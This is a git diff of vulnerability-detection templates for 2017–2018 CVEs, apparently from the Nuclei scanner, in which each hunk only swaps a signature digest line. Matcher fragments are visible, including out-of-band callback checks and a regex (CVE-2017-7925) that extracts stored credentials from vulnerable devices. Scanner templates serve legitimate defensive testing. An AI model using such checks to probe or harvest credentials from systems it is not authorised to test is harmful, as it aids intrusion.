@@ http: - type: status status: - 200 -# digest: 4b0a004830460221008a69ff7f15550e188833653715e806a3a8703cf6f4a4d616f2d4e7c28b94ab9e02210094fedc4441076e836ff319c9f284d178534bffb62e0b4bcc6198461267530733:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eaf87cd3f41a59d1f17965bacb499f037581b695cc274c0f2d75539408d1c0a3022100bae5c484a388a4845b5c87689f7336b1e104e057c660966106700f7f3868dec3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index c8806bec7b..39bcff7956 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c19f020aa6bfccbac6868aec75c0c00e20aef7662cde28d4789958cdb958eb23022014ef665f00ba30656739a02baf1c80ec9a2d21070fe41be89d0a4efebe7e470f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220453ff9a8b4bf5d76f4e9a0b6279070bfc7970710b6fe12ce43490ae35048306f0221009508732e9441b0b0233bb49ff7cea6eb08ce8fcf56b334b5b98c7aa2c4df72b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index 67557bf1f8..bf8129ee8b 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200905959bdf8b3c52f5651d687c22d12b182f9c03ddd0e8105a5aeb3a66f46965022100a59cf1e2d4a9d2658e48ed9b77627a247c8ce86a9792a0a28fa86d87b4c96cdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207eee03d499f888d2ce6bd610c3f1bc523bed801c462624c96ddbad7ca0a8f79c02210095f65c3b825b4a1baec9ea685d9e5c9cfd53af9449aa3886dcf3eb12e25e9b56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index 182f6deb84..a365de9e20 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b0f51360d33162a65e7c4ce59fa9fc61dabbcded30b948b60a6fec88ee9dbb5a02201511e43a79f67714df296145d958a26b04891d71c7453ff1c896eda4a54f440c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a2e4cadc11842b8c7cccfa7f8e7204c94853a57de98751048b814aed98991094022100be62e492a049f1324ac3b62306a19e7599d95531fce2d17fdbca353b8a2b6ece:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index 98879d7e9d..48fe21e8e0 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008e22cb923cf339467d711031932cc68618e58bf07d6e109415485a127957da45022100fde6cea8324f871c7c0697f1b28d26a9f89c8bc02404bc8708565726a63dede8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d2fdd3ea6243caf5ecbf066fa043bc189c219ddad8120159650bd83852c34652022100c07dbc19dbc07419f9b7dc7371eb6dc9c659a5900dddb26892ebde5a1e2a51a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7855.yaml b/http/cves/2017/CVE-2017-7855.yaml index f5e8de9ff5..5916e5ad2e 100644 --- a/http/cves/2017/CVE-2017-7855.yaml +++ b/http/cves/2017/CVE-2017-7855.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100af1698012d89906a13f4e5f6cf4f61e907d4b64a6957aea77d5dd6d3f4ee6056022100b0ee8fb7411befbf7e4f701a3ea21a18dd6d8cc9d948e4e493608f308b588619:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e4aa1b07cacbb6405f5911131f1874f193457a4211fbba60681d13db34f7559f022100b478da782d507d2edb0e43567ac4e9a61232ba97bee470889c209251f66f47a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index 835da52cf3..7a5324e8be 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -44,4 +44,4 @@ http: part: header words: - "application/xml" -# digest: 4a0a0047304502205c55b69e712c5dfc42cb623113b3d6099efa4cf93ecd535ba15205e196b150b2022100e04e88aee3a9f03a417f1f24886271082665b682b7971dc10ec93d65a9b8c4f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022006bf1328d98ef7a765e9a467bb2ae47ad3c65f4b1f0b4fa5b8e9b2356907511a022027601c3d3665c0854704bfd676295821b7ecb55c4fd4cafd64afc3905f8b6674:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml index cd1bfe974f..0421678642 100644 --- a/http/cves/2017/CVE-2017-7925.yaml +++ b/http/cves/2017/CVE-2017-7925.yaml @@ -47,4 +47,4 @@ http: group: 1 regex: - 1:(.*:.*):1:CtrPanel -# digest: 4b0a004830460221009b4c15a7a1a24b4a7a821fbfe255234774fc91e625da5ed03ba0a8f9de19fe7c022100f7b352df1c00caccdc15d4242b81ce7ccdcae866d591811df1c9d8b7c8860d55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200dc0b46f33725d1a32a34611a27dcc793c5c4671ac4a19e36f4068812fd358f5022100b5d8c1b1887b1bd5ae54e67a0df1d3b0e3cb76f6db1d4158831f98ea0e7206a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-8229.yaml b/http/cves/2017/CVE-2017-8229.yaml index af0b3ebac0..c085dd0efe 100644 --- a/http/cves/2017/CVE-2017-8229.yaml +++ b/http/cves/2017/CVE-2017-8229.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ce0c0a06f46fe6df8ffa2c5acd9d6439e02706ae203a84b06d58e1ae036addf702210096d13ead0464983c2e4272364a8e2d1472bb584cc2207501294ad6b97bc9f8f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207539b77d24cd970989e397375252b664836c10c47139b4d5853baaf86f6ee44a022030e1a82a90269b4c9bcdec314c95cecb621c9cf4cc7f6185a140c5b41fc9d152:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index 84d9956e79..fec78abfba 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml @@ -43,4 +43,4 @@ http: part: body words: - '{{md5(num)}}' -# digest: 4a0a00473045022002e8f8271fba712f8da2739697d742fd365a373c2230f2d7066d3ae4828266af0221009aaa6b110272e3ac9b5054679edcd78b911e17cb82e480432a4e18ff3567d5b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022035e920a183443133e6f6d68532b4ea018563d06225d38addf97255fa0377ac2502200e19961090025ca0af9749d1238064a7c36ffa063cb6ec051e6df3d74a2564d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index 1138f9eafc..56bfe02811 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ b/http/cves/2017/CVE-2017-9140.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b3a8516317787834e151bad4141c425f981ec9cb3d72aa7b9d48a42aac07222902203bfdb8e6be6ef1eb9ed373294e43a701b7902739aa87514110e6101663118497:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022020ef720c8fe44ef47024a018469cfc5f4bc6108a27f0ea755d215f7b32b3dc66022005ba957951abbd96a6a015293ae0301aa765909e14312405db1abca9b69a05b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 64ba29cbcd..1322555809 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220374994832bf2b307949a4a6cac462a65388b7fc27c85adf704b0af7b94661ff60220471580d75d6e1442f4a705dd4fdb43ff6c3014e3ae84d5923400065d52f72318:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022021b8f498b3b3e12e1f7ee491a5d6e10f94f4d8db74fde3a2d56ba45a471f65c7022045618ea90b360ba7fe1fbd65c340b24eef66ef13107f97916f5ad1c726328ef0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index bf0f287530..f16bc0ee9c 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -51,4 +51,4 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and -# digest: 4a0a00473045022067848037505007c47805f20fe5f54b0e220567ffac86100514382abd8f4d923b022100c5a94d3a092fe4b836a70556af70d03ef2c225d9795f4565e1ff09ea3eaefc8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f2053a1b1e5f99d36d78038a2fdfe3a76df7b9fc1d943f2d9d58f90528ec158502205c342c08f89513d4c4784fda282c78aeb1be6fbdd4013dc68fc87cb611dc2966:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index fe46281b14..69bed2f75e 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -41,4 +41,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022100c944ded5ed53c2586c90b55d8d776a89f707da01e95be6f8a82e036de01a86b8022007596a87df99e77294fddee5b74715c68d8ef6fe30a571fc6c41bdbd79903384:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022010826ceb3cc6e35143b7d9e13d87a6e20adf7cc28c355d0da4dcde85a4544058022100f3178910fc458d53ee0722f0e868981ccc3d9167c7c798cb25286ee17fb4cf63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml index d88861b464..f578fdb183 100644 --- a/http/cves/2017/CVE-2017-9791.yaml +++ b/http/cves/2017/CVE-2017-9791.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210089474676970b53af0e084b484fe46bba8974eb15aff4ac7259a7aadae18ee3e6022100f52f8ea7aca289b169b51328419cfbf6d4849af05526f53d28291051f76b8185:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204d302831aa64271e14ba463e051402c425bd3a23f99b23731e35164975c92f970220743e9a9430260f65d7f72a4834d23c1117c62b9020e0419386cbd1cf8c2fa033:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml index 9a844dfe1d..4da78f95e3 100644 --- a/http/cves/2017/CVE-2017-9805.yaml +++ b/http/cves/2017/CVE-2017-9805.yaml @@ -108,4 +108,4 @@ http: - type: status status: - 500 -# digest: 4a0a004730450221008de74775ae617d65b232ac30b20f3b2c1f00fb837d7ef86fc88191d99cbc44b002200bebb1d1baeddc201ea93f0d12ce75b571f4e32151fb2519a3f69b37e13e8549:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206516cae14c92562d40847af7cf2962d2b939ca350b26f6d8f2b15553966dfcb1022015c0fe613add268df436cd6e17b66cde24f32ae88c80ab68d56acf275e41b2b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index 71c8046473..3513e5c407 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 404 -# digest: 4b0a00483046022100d1436a29f03225bbc77f741d51d379f4a6bb05476176a18bc040dfe820325d81022100973e591186cde8db71bdc700ee4bfd5a05c8c61ae64127de26602bdcc6618a79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220047b086db803893c8c8acd55e652a220053a9ed115334a723aad6f7bafc749f6022100c754344e41c6ca13bd4c22e9b027c8021a6bff475bf3cb1e89981184fe54472d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index e53965242d..9f791a618c 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009341e87d05bb493b25995eaf769a88562f89476fc54ef56eb24a822bb3c6679202207c32d08d64220af1a904536d6acbfa5deb972a408d62a3e9524095eda861e26f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bf013ee86ae766dc76fb1644d3c07cb30399242e2ab716578b537df17cb8f813022100ca4feadc27a2a7577b0cff81d4f3f4aa20e53d28e485dd9d91a04934e8ec0a18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9841.yaml b/http/cves/2017/CVE-2017-9841.yaml index 66be7364ef..247b4fcdab 100644 --- a/http/cves/2017/CVE-2017-9841.yaml +++ b/http/cves/2017/CVE-2017-9841.yaml @@ -76,4 +76,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c3f4cac26fcbb941795a1279ee49d23cb7ffc632d52b64086bea8696ca1e7a1e022100ce0da586282d6dbf5cffd7df38409f5d91d6be053827b21b618a142a2b64b601:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203eaec3ddd27016abf4aab6a54f9758d4fec83b301c9824e32dad9503a889e13f022100e88149e3c76547ced2e2217d66a768e02b3aa3a9ccc608bd405ead2c0cd0f209:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index dffe69f984..ffcab418a6 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022000bf714332242c7a958ed786e041db79aba5724775b1109dbb2277c28f5dc32b02201c53d0a1fc4df1ddf01dcb1503469503dab9789a907b95583c981e3a5d64d8f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210099b0004c78261546ddee92f813ed07033007e7a8dd0ff0a86a8f24eedf199617022100a4d24a04b55d1f74aeb50551620875db7c38cba9f89652f3a5dbf50e545fae29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml index 08d54df7f0..25dc2c2522 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b887ed4c27311aed1b2f37a779838d841a9b0443459239f2393e5f10a63601f30220407b0a90f6879e7f9950bdb53baba82228c6210a398b9dd3cb3bc4934de55707:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b909f60ddf37fbae4b7e856df528882a5cc7dc94f65ded2914523745fa0ff6c3022100899967395175e5fcbabeda1296d48bb97e26d14c51e2c96dae93752c33c60af2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index 04cad08a83..16672e4d96 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008a61d5fe8b4c920a9ff5bed18b8666320288d3c3db08180072cfcfb376687733022058824b1359b49a021788729c453487a7d8206fe18ca070e8da78b853e891d00f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205118192337b4af97ce9d22957ca3371eaec923255451c22166e84802a9c912c30221009296cfc968ff388141b6f588f503d23895321dc53e64776a66728c27790ab4c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index 24499bb46b..a9c34a640f 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203c5400dbefa380921393b2c141d95b7e566ef5b7a9cf099997d2e6bd57bb1021022068f5f5c50bdaaf45a919eb2611bbb7646b34a436127de86ba55b6615fa667617:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210092e0bbacadf83d2c3600089ee99c367483591c5512ae2e6bc71caaed491c1f6702206a54ded67aa406f34d005a9bbb6c91a6eeee779f3bbcc9c7724c4e91035a0fc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index c621f2addf..01432179d5 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b203eeaa3c21c2aa5b7fe886ab8524f7df3c00cddc5b808d2c417f511729d47202204442fc6fa5e9dfb4b3e7a64d83fd565402edb9f5d0bc2a78853475097b673a7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009b3fbd849a6f7c714a37f622e1a1cbd9ee15e6aef794e1c0526bc29d50673fd702207ece3ba32dea3c2af13bb208fffbc107bbdae0209793fdfd6e24a6fb96fec8b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml index fbf8104906..1aecaaa649 100644 --- a/http/cves/2018/CVE-2018-1000533.yaml +++ b/http/cves/2018/CVE-2018-1000533.yaml @@ -54,4 +54,4 @@ http: - '(.*?)' internal: true part: body -# digest: 4a0a00473045022100a483f2e85a0a61d5442379f553a81b168cb303b02f98d1d0184615f64f55c39802206b82f6795f61c317a25436bfaaf0c775004939d135660be36de0fac888dffdde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9a3a85f3ff24183bde9b7d08b966e66ae62e88677d244ee2d47315b563350be02210093343d04a59f16324e4c789c7fb81b788edda757d9973b6ea314e6b37256f897:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000600.yaml b/http/cves/2018/CVE-2018-1000600.yaml index 80e2041567..3ea8ef820e 100644 --- a/http/cves/2018/CVE-2018-1000600.yaml +++ b/http/cves/2018/CVE-2018-1000600.yaml @@ -40,4 +40,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a0046304402200516063b8f46f603695fe6daeb0c86266c0b5c05818b3cea995ff84873e3118402206cd2a3f491ce4f852cc50781bba8e88f14c2da1066feb45b7a7156e3ea4dc8af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203b4af4078977793c0b3f79a08da8b45089d14b94a74f9a50e4b9ddc3f8024c07022100b6e026c274511261a4fbd14de4b619cd3a32141480cd493e11bf4e295b96de4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index 2ee0cdabb8..ccffef8cf7 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a004830460221008317268039141171e9f4697b55b29acacacf55a997d3689eef2e0aadfad2a0a2022100875a37481edac3278a765ceb2b55b7ee392c0bc9416433def5dc63d3136e90df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220133a71600f34154a53c97905292de4cec0a85036e82ebc39e8ac5507edb063ae022068c2ab9164f0ab43765cc2525eaa488c7ee8757ccb9c5cd4b0d104128eea483f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index 7f88e21f1d..50570bd7c5 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022013cc56c0788009e72a90ad50fb02772d4d13e0a6d8345ea9ff32111c59a227800220243ef50e4cc4f7ff9ab318d7637ef981da6ee3b7d1cd175628dad853539050fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220647eb1aaf4aa73d4ecb498b9abc0036d54763bea7c8322de33af251f51e86a13022100c75692cf743e0383995ab11de78c6068af087c5141838192afd0ade9631ff08a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index 6afe3159f6..f5622c73f5 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220392ddae9094cf42a0be96a1f52e5a7e5aba557e48d8e7626626de55207a0f5b8022100ed04daedd75764426b5b67d30c49627ec4c90d16706567bbb112087a301cc1f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206bbb2ae1e27df9cd659e84a796124d95f75a84ba75da12e0c7ede001a940aece02204d214f83c2296bd6ed4f0a4f2f84f4381f53228e7f3a4a0bb75948b03c512a02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml index aa13645e44..55fc67627d 100644 --- a/http/cves/2018/CVE-2018-10093.yaml +++ b/http/cves/2018/CVE-2018-10093.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009a8f12052a0797f7cbbed43a8cbf98d2d2276859de246afeb55689bf0cb58581022012822d81dd35ea01de36a4407fdc3783d804bcdf3249a4936b4b7b05d08d7698:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bebd878b466091a37b504b9787a05b8f980d27d9d149387afcb5f9f82d02589002207ec8f6c4ffd96c83195952c762aa3f4bf16105bee6951a03a5c8b8c874997244:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index 9a8f185692..e83851d6c9 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008f11a936459593b0d30f548fcdc761d05f79b578a98024c49efa84763b6dc801022100dacbb104d78edac86c44f54c8925b4f1828cadfbc0d4fa22a0406257147d09db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206cac168ce4425a484e9b00b082991a124c7ede242dbeb3a92dff4488cf6c7f6c02205eaeb79b76578dfa8418987a13ffd32d2e9542fb9b1ccdd190ac1ac35d235f87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index af68983add..a75e182637 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220472960bc7baecc2f34a1c09cd71028ea9a9246cc11771228277cb5077abdb96b02200a1a0a24c16dd85344120e450dd0385e72bfbd5ba12c3bcebfed275b1eb9880b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100868b0cd6158db975814ed537776b75d03cfcd2aa50ac296ef59690af82a30c0b02210083dbffd3451472a25063f7e4e9758450472c05905b5c2079c849016c8640f0d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index fc6baa0491..c5cd80d023 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml @@ -46,4 +46,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a0047304502207bef5efa8ba61c5a90904662c1339b7a82a553d40a795b1ed42a79e0cd2ce78d022100a2b0fb19f6b71ce233558b6490c85c83337e0272ba51205fd9de55b7fd56d71e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009d05810bc1e3f80229f18467a0394648f6c3c7f39515070adbb74d7f1bddaa850220568ab98b34871bfcfe5dd30a862f9dd4469e89c2f14c4a06b58f6a528d17d884:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index e8555732d9..feadcb357a 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009bf9ff58bd53c05ecebe3fe711794d2af732156efc1c103f8716fe86408cf41c022100bc9272148cc6fc921c5c666d280933eef0c2e355dc94dc54f7af82f1a461b7ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201423fd900a1cd2dcf52028722c5f7a43f8b6d20d5a5b65d58f59ffed42a8f6ff02205da25d220a25b5faef2f03778f2b749c7a385c901429baf839f1815fc1681d28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index 003492d353..5ddf231497 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -56,4 +56,4 @@ http: part: interactsh_request words: - "User-Agent: {{useragent}}" -# digest: 4a0a00473045022100a9156dd7f51f9daedd85545885cd8de4310f5e2f19cc8ca01ca1a63ba36a46e00220230db4bfe7711478155d2b8593dfde09e8c16b59b2f6741dd1ec49f21c86dbb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eff8002cdfe102f6a45b3310a529b3082ffce269cf60f0c09c44bf7d7ffbd0480220239d1b6bfa938a51d3f70bafedef9c3b99f833dfb44e2580e054d49a0a86147e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10822.yaml b/http/cves/2018/CVE-2018-10822.yaml index 9a57b06fb3..8a6db6be80 100644 --- a/http/cves/2018/CVE-2018-10822.yaml +++ b/http/cves/2018/CVE-2018-10822.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cbf8e303e514337053ef047c67628404dc7c3c0e4d2c92e62f0454ef93e7db5c022013d61bf969a523c7fb763697cec3ce22aea57c1db022f1cba322bec8f6c55bff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d335fc81919ea89b8ab1e3d83f48e24ad1e9e07a489800119d057e7a5e046735022040e37414cf0741fcbd9ad5623d68ec506b04f73118d6d6a0dc040ce234c1847c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10823.yaml b/http/cves/2018/CVE-2018-10823.yaml index c7f51bb5e9..a025fae239 100644 --- a/http/cves/2018/CVE-2018-10823.yaml +++ b/http/cves/2018/CVE-2018-10823.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ce33a79e6b3d3401c0e63540242834659be6ef9047431d15c88c4fbec40939dd022019045ce46747021f90a207e75119bdbf1d6cb67b21f94602bfb46baca209264b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 